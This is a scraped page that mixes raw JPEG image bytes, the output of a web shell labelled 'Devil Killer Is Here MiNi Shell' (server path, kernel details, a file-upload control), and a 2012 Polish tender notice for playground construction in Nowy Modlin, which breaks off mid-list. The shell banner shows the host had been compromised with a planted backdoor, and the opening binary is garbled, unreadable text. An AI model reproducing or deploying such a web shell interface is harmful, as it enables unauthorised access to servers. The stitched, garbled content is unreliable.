JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120405/79353-N-2012.html

<p class="kh_header"><b>Pomiechówek: Budowa placów zabaw wraz z boiskiem w miejscowości Nowy Modlin</b><br>
<b>Numer ogłoszenia: 79353 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pomiechówek , ul. Szkolna 1A, 05-180 Pomiechówek, woj. mazowieckie, tel. 22 7652724, faks 22 765-27-10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomiechowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw wraz z boiskiem w miejscowości Nowy Modlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	Część I zamówienia - Budowa placu zabaw wraz z budową boiska do siatkówki 
i koszykówki w Nowym Modlinie, działka nr ew. 31.
1.1. Urządzenie terenu rekreacyjnego przewiduje następujący zakres robót: 
a)	roboty ziemne,
b)	układanie krawężników,
c)	układanie nawierzchni,
d)	montaż ogrodzeń,
e)	urządzenie elementów małej architektury.
1.2. W ramach realizacji zadania przewiduje się:
a)	wykonanie ciągów pieszych z ukształtowaniem terenu,
b)	wykonanie boiska do siatkówki i koszykówki z nawierzchnią z trawy syntetycznej,
c)	wykonanie ogrodzenia - piłkochwytów,
d)	montaż wyposażenia tzn. ławek, koszy na śmieci, elementów zabaw dla dzieci 
i innych elementów małej architektury,
e)	nowo ukształtowany teren przewidziany jest do humusowania i obsiania trawą.
2.Część II zamówienia - Budowa placu zabaw w Nowym Modlinie, działka nr ew. 14/7.
2.1. Urządzenie terenu rekreacyjnego przewiduje następujący zakres robót:
a)	roboty ziemne,
b)	układanie krawężników,
c)	układanie nawierzchni,
d)	montaż ogrodzeń,
e)	urządzenie elementów małej architektury.
2.2. W ramach realizacji zadania przewiduje się:
a)	wykonanie ciągów pieszych z ukształtowaniem terenu,
b)	wykonanie ogrodzenia systemowego,
c)	montaż wyposażenia tzn. altany, ławek, koszy na śmieci, elementów zabaw dla dzieci i innych elementów małej architektury,
d)	nowo ukształtowany teren przewidziany jest do humusowania i obsiania trawą.
3.	Szczegółowy opis przedmiotu zamówienia zawarty jest w: dokumentacji technicznej, specyfikacji technicznej wykonania robót oraz przedmiarze robót, określonej w Rozdziale III niniejszej SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie prawo udzielenia Wykonawcy zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, na zasadzie art. 67 ust. 1 pkt. 6 ustawy, w przypadku wystąpienia potrzeby wykonania zamówień uzupełniających oraz posiadania przez Zamawiającego środków na ich realizację.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.20-8, 45.11.27.23-9, 45.23.61.10-4, 37.53.52.00-9, 45.11.12.00-0, 45.11.27.00-2, 34.92.82.00-0, 45.23.32.22-1, 77.21.16.00-8, 45.11.27.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 
1.1. na część I zamówienia: 4.000,00 zł (słownie: cztery tysiące złotych),
1.2. na część II zamówienia: 1.000,00 zł (słownie: jeden tysiąc złotych).
2. Wadium należy wnieść przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
a) pieniądzu, przelewem na rachunek bankowy: w Banku Spółdzielczym w Nowym Dworze Mazowieckim O/Pomiechówek nr konta 38 8011 0008 0020 0200 0273 0003,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.). 
3. Wadium wniesione w formach, o których mowa w pkt 2. od b) do e) należy złożyć najpóźniej w dniu 20 kwietnia 2012 r. do godz. 9:30 u Skarbnika Gminy w siedzibie Zamawiającego, pok. 4, po wcześniejszym umówieniu się telefonicznym (tel. 765-27-14).
4. Kopię dowodu wniesienia wadium (jeśli zostało wniesione w pieniądzu) lub kopię wadium (jeśli zostało wniesione w formach, o których mowa w pkt 2. od b) do e), potwierdzoną za zgodność z oryginałem, należy dołączyć do oferty.
5. Wadium musi obejmować cały okres związania ofertą.
6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7. Wykonawca, który nie wniesie wadium w wysokości określonej w pkt 1., w formie lub formach, o których mowa w pkt 2. zostanie wykluczony z postępowania.
8. Szczegółowe uregulowania dotyczące wniesienia wadium, jego zatrzymania i zwrotu regulują zapisy art. 45 i 46 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca ubiegający się o udzielenie części I zamówienia musi wykazać, że wykonał w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną rodzajowo i wartościowo porównywalną z przedmiotem niniejszego zamówienia, tj.: polegającą na budowie lub przebudowie co najmniej jednego boiska sportowego ze sztuczną nawierzchnią o wartości co najmniej 400 tys. zł brutto;
2.	Wykonawca ubiegający się o udzielenie części II zamówienia musi wykazać, że wykonał w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną rodzajowo i wartościowo porównywalną z przedmiotem niniejszego zamówienia, tj.: polegającą na wykonaniu co najmniej jednej roboty budowlanej o wartości min. 90 tys. zł brutto.
3.	Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana 
wg formuły: spełnia - nie spełnia. Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, Wykonawca zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia. Warunek muszą spełniać łącznie podmioty występujące wspólnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować potencjałem technicznym zapewniającym realizację niniejszego zamówienia. Zamawiający nie precyzuje w tym zakresie szczególnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać, oprócz oświadczenia, że Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania niniejszego zamówienia. Warunek muszą spełniać łącznie podmioty występujące wspólnie. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi dysponować osobą zdolną do wykonania przedmiotowego zamówienia, tj. kierownikiem budowy posiadającym ważne uprawnienia budowlane 
w specjalności architektonicznej lub konstrukcyjno-budowlanej lub inne uprawnienia budowlane uprawniające do wykonywania tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane ww. specjalności.
2. Wykonawcy ubiegający się o udzielenie I i II części zamówienia mogą zadeklarować dwóch kierowników budowy (jednego dla robót stanowiących część I. zamówienia 
i drugiego dla robót stanowiących część II. zamówienia) lub wskazać jednego kierownika budowy, który sprawować będzie funkcję kierownika dla robót objętych częścią I. i II. 
3.Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana 
wg formuły: spełnia - nie spełnia. Jeżeli Wykonawca polega potencjale innych podmiotów, to zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając 
w tym celu pisemne zobowiązanie do oddania mu do dyspozycji niezbędnych zasobów (osób zdolnych do wykonania zamówienia) na okres korzystania z nich przy realizacji zamówienia. Warunek muszą spełniać łącznie podmioty występujące wspólnie. 
4. Zamawiający określając, ww. wymogi w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiednie uprawnienia wydane obywatelom państw Unii Europejskiej, Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawa budowlanego oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394). W przypadku, gdy kierownik budowy nie włada językiem polskim w stopniu zapewniającym swobodne porozumiewanie się Wykonawca na własny koszt zapewni tłumacza, który zapewni stałe i biegłe tłumaczenie w kontaktach 
z Zamawiającym i Inspektorem Nadzoru, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia. Wykonawca winien wziąć pod uwagę, że z uwagi na zakres zamówienia tłumacz winien być biegły w tłumaczeniu zagadnień technicznych, ekonomicznych 
i prawnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
2.	Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana 
wg formuły spełnia - nie spełnia. Ww. warunek muszą spełniać łącznie podmioty występujące wspólnie. Przy ocenie spełniania ww. warunków Zamawiający weźmie pod uwagę potencjał wspólny tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. certyfikat lub deklarację zgodności z normą PN-EN 15330-1:2008, lub aprobatę techniczną ITB lub rekomendację techniczną ITB, lub wyniki badań specjalistycznego laboratorium (np. Labosport lub ISA-Sport lub Sports Labs Ltd) potwierdzające parametry oferowanej nawierzchni lub dokument równoważny,
2.kartę techniczną oferowanej nawierzchni, potwierdzona przez jej producenta, 
3. atest PZH lub równoważny dla oferowanej nawierzchni,
4. autoryzację producenta trawy syntetycznej, wystawiona dla Wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tę nawierzchnię.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony. Gdy do oferty dołączona zostanie kopia pełnomocnictwa, to musi być ona poświadczona za zgodność z oryginałem przez wystawcę pełnomocnictwa 
lub notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne zmiany umowy mogą obejmować w szczególności postanowienia dot. terminu realizacji przedmiotu umowy, wysokości wynagrodzenia umownego lub zmiany zakresu odpowiedzialności Stron z tytułu niewykonania bądź nienależytego wykonania umowy.
2. Ww. zmiany umowy będą mogły nastąpić w szczególności w następujących przypadkach:
1)	zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszej umowy rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej, o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej Stronie; za siłę wyższą, warunkująca zmianę umowy uważać się będzie 
w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe (nadzwyczajne o tej porze roku) załamania warunków atmosferycznych, nagłe i długotrwałe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron;
2)	odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
3)	wystąpienie okoliczności, których Strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
4)	wystąpieniem warunków geologicznych, archeologicznych lub terenowych, utrudniających lub uniemożliwiających wykonanie robót budowlanych zgodnie 
z treścią oferty (w szczególności: niewypały, niewybuchy, wykopaliska archeologiczne itp.),
5)	przerwania lub wstrzymania robót na skutek działań osób trzecich lub organów władzy publicznej, które to działania nastąpiły z przyczyn niezawinionych przez Wykonawcę,
6)	konieczności wykonania dodatkowych badań, ekspertyz lub analiz itp. nieprzewidzianych w specyfikacji istotnych warunków zamówienia,
7)	urzędowej zmiany podatku VAT, mającym wpływ na zmianę wartości brutto wynagrodzenia umownego, przy czym koszt wzrostu podatku VAT pokrywa Wykonawca,
8) 	niezachowania przez Zamawiającego określonych umową terminów, mających wpływ na terminowość wykonywanych robót przez Wykonawcę.
3.	Propozycję zmiany umowy może zgłosić pisemnie każda ze Stron. Zaistnienie okoliczności, o których mowa w pkt. 2 ppkt 1, 2, 4, 6 musi być potwierdzone na piśmie przez INSPEKTORA NADZORU.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomiechowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pomiechówek, ul. Szkolna 1a, 05-180 Pomiechówek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 09:45, miejsce: Urząd Gminy Pomiechówek, ul. Szkolna 1a, 05-180 Pomiechówek, pok. nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający realizuje niniejszą inwestycję ze środków własnych oraz ze środków Unii Europejskiej, tj. Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich, objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013, Oś 3., działanie 313, 322, 323 Odnowa i Rozwój Wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa placu zabaw wraz z budową boiska do siatkówki 
i koszykówki w Nowym Modlinie, działka nr ew. 31.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Urządzenie terenu rekreacyjnego przewiduje następujący zakres robót: 
a)	roboty ziemne,
b)	układanie krawężników,
c)	układanie nawierzchni,
d)	montaż ogrodzeń,
